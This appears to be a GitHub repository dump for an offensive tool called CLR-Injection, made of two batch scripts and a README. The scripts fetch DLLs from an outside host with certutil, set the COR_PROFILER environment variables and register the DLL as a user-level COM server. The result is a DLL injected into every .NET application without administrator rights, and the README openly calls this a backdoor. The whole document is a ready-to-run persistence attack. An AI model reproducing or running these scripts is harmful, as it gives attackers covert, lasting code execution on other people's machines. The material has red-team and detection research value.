├── CLR-Injection_x64.bat ├── CLR-Injection_x86.bat ├── README.md ├── autorun.png └── poc.gif /CLR-Injection_x64.bat: -------------------------------------------------------------------------------- 1 | ::Inspired by @subTee 2 | ::No need Administrator rights 3 | ::Need reboot or log off and re-logon 4 | ::Inject all the .NET apps 5 | ::Support x86 and x64 6 | wmic ENVIRONMENT create name="COR_ENABLE_PROFILING",username="%username%",VariableValue="1" 7 | wmic ENVIRONMENT create name="COR_PROFILER",username="%username%",VariableValue="{11111111-1111-1111-1111-111111111111}" 8 | certutil.exe -urlcache -split -f https://raw.githubusercontent.com/3gstudent/test/master/msg.dll 9 | certutil.exe -urlcache -split -f https://raw.githubusercontent.com/3gstudent/test/master/msg.dll delete 10 | certutil.exe -urlcache -split -f https://raw.githubusercontent.com/3gstudent/test/master/msg_x64.dll 11 | certutil.exe -urlcache -split -f https://raw.githubusercontent.com/3gstudent/test/master/msg_x64.dll delete 12 | SET KEY=HKEY_CURRENT_USER\Software\Classes\CLSID\{11111111-1111-1111-1111-111111111111}\InProcServer32 13 | REG.EXE ADD %KEY% /VE /T REG_SZ /D "%CD%\msg_x64.dll" /F 14 | REG.EXE ADD %KEY% /V ThreadingModel /T REG_SZ /D Apartment /F 15 | SET KEY=HKEY_CURRENT_USER\Software\Classes\WoW6432Node\CLSID\{11111111-1111-1111-1111-111111111111}\InProcServer32 16 | REG.EXE ADD %KEY% /VE /T REG_SZ /D "%CD%\msg.dll" /F 17 | REG.EXE ADD %KEY% /V ThreadingModel /T REG_SZ /D Apartment /F 18 | -------------------------------------------------------------------------------- /CLR-Injection_x86.bat: -------------------------------------------------------------------------------- 1 | ::Inspired by @subTee 2 | ::No need Administrator rights 3 | ::Need reboot or log off and re-logon 4 | ::Inject all the .NET apps 5 | ::Support x86 and x64 6 | wmic ENVIRONMENT create name="COR_ENABLE_PROFILING",username="%username%",VariableValue="1" 7 | wmic ENVIRONMENT create name="COR_PROFILER",username="%username%",VariableValue="{11111111-1111-1111-1111-111111111111}" 8 | certutil.exe -urlcache -split -f https://raw.githubusercontent.com/3gstudent/test/master/msg.dll 9 | certutil.exe -urlcache -split -f https://raw.githubusercontent.com/3gstudent/test/master/msg.dll delete 10 | SET KEY=HKEY_CURRENT_USER\Software\Classes\CLSID\{11111111-1111-1111-1111-111111111111}\InProcServer32 11 | REG.EXE ADD %KEY% /VE /T REG_SZ /D "%CD%\msg.dll" /F 12 | REG.EXE ADD %KEY% /V ThreadingModel /T REG_SZ /D Apartment /F 13 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # CLR-Persistence 2 | Use CLR to inject all the .NET apps 3 | 4 | - Inspired by @subTee 5 | - No need Administrator rights 6 | - Need reboot or log off and re-logon 7 | - Inject all the .NET apps 8 | - Support x86 and x64 9 | 10 | POC: 11 | 12 | ![Alt text](https://raw.githubusercontent.com/3gstudent/CLR-Injection/master/poc.gif) 13 | 14 | 15 | When the system calls the .Net apps by default, the backdoor triggers automatically. 16 | 17 | :D 18 | 19 | ![Alt text](https://raw.githubusercontent.com/3gstudent/CLR-Injection/master/autorun.png) 20 | 21 | More details: 22 | 23 | https://3gstudent.github.io/Use-CLR-to-maintain-persistence 24 | -------------------------------------------------------------------------------- /autorun.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/3gstudent/CLR-Injection/175318105733c6fdaaa2adaa2196473ebc7c74ad/autorun.png -------------------------------------------------------------------------------- /poc.gif: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/3gstudent/CLR-Injection/175318105733c6fdaaa2adaa2196473ebc7c74ad/poc.gif --------------------------------------------------------------------------------